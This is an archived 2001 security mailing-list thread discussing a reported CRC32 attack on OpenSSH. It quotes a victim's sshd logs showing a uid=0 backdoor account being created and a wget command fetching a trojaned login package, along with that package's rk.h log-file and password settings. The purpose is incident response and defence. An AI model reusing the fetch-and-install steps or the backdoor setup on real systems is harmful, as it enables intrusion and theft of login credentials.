Re: Attacks against SSH?

From: Armando B. Ortiz (aortizat_private)
Date: Mon Dec 03 2001 - 11:20:56 PST

  • Next message: Jose Nazario: "why the nimda upsurge again?"

    Per se, I have not seen anyone attacking my systems in general via SSH,
    but I only allow limited access to my servers via any type of remote
    login facility.
    
    Firewalling your SSH and only allowing connections into it that you want
    might help to curb some of the attacks people are seeing.  It's not very
    difficult to do...just takes a little time.
    
    
    
    On Sun, 2001-12-02 at 23:30, johan.augustssonat_private wrote:
    > 
    > I stumbeled over this post at openssh-unix-dev mailinglist last week -
    > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
    > The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for
    > RedHat 7.0) up and running when he received what looks to be a
    > CRC32-attack. A few minutes later you can see (he posted parts of the
    > logfile) a new user being created with uid=0 and then how an connection
    > is made from system in Israel.
    > 
    > There has been no confirmation about what he writes but I recieved the
    > following mail as an answer of my questions.
    > 
    > ------ Message ------
    > I posted an openssh security alert earlier today and already got some
    > responses.
    > Thanks for everything.
    > 
    > Instead of replying to everyone individually I composed the details of
    > the
    > attack.
    > 
    > +++
    > 
    > It does not look like a job of worms.
    > Snort did not detect mass port scan from attacker's ip address. It seems
    > that he (I assumed, so I don't have to type he/she all the way) just
    > wants
    > to gain access through openssh.
    > 
    > The server is running Red Hat 7.0. With all packages up to date. The
    > following daemons are running:  wu-ftpd, apache, telnet, openssh, named
    > I never access the system via telnet, it is there just for backup
    > purpose.
    > 
    > > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation
    > attack:
    > > > network attack detected
    > > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
    > > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
    > > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,
    > gid=528,
    > > > home=/home/mattanl, shell=/bin/bash
    > > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
    > > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,
    > gid=529,
    > > > home=/home/mattan, shell=/bin/bash
    > 
    > After the attacker gained root access. He created two users mattan and
    > mattanl.
    > He then downloaded a package: wget
    > http://home.dal.net/resolve/login.tgz.
    > The target site has been compromised. (hacked by a hacker group in
    > Israel)
    > This is a login replacement package, it logs the user id and passwords.
    > He
    > modified rk.h to:
    > #define MY_LOGFILE "/dev/ttypz"
    > #define MY_PASSWORD "1245890"
    > After he complied and installed the login replacement. Something went
    > wrong.
    > /bin/login was zero bytes in length. So when he came back using telnet,
    > he
    > was denied of access. I also disabled sshd and kept one session open for
    > remote control after found login was replaced. I md5 checked the system
    > against a good backup, nothing else was altered.
    > 
    > I will try to sniff all packets come to my this server on ssh port. If
    > he
    > attempts to crack the server again, I will have more details. But I
    > guess I
    > will have to turn the server back on.
    > 
    > Thanks for all you time
    > ------ End of message ------
    > 
    > I had some further questions so I mailed the guy once again but has not
    > recieved any answer.
    > 
    > So, to he main question.
    > Has anyone else had a system compromised by the CRC32-attack when
    > running a version of sshd that is believed to be secure? OpenSSH-2.3.0
    > or later, SSH 1.2.32 or later.
    > 
    > 
    > 
    > /Johan Augustsson
    > 
    > --------------------------------------------------------------------
    > Johan Augustsson                 Phone: +46 (0)31 773 1000
    > Incident Response Team           Fax: +46 (0)31 773 1087
    > Göteborg University              E-mail: Johan.Augustssonat_private
    > Sweden
    > --------------------------------------------------------------------
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    -- 
    -----------------------------------------------------------------
     From the Linux Box of Armando Ortiz
                           System Administrator
                           OnLineTraffic.com
     Email:  aortizat_private
     Download my public key from:
      ftp://209.185.214.98/pub/pubkeys/aortizat_private
       or retrieve it from
      http://www.keyserver.net as aortizat_private
                                 (Public Key expires 01/04/2002)
           All emails from me are signed by this public key.
    -----------------------------------------------------------------
    
    
    



    This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:52:53 PST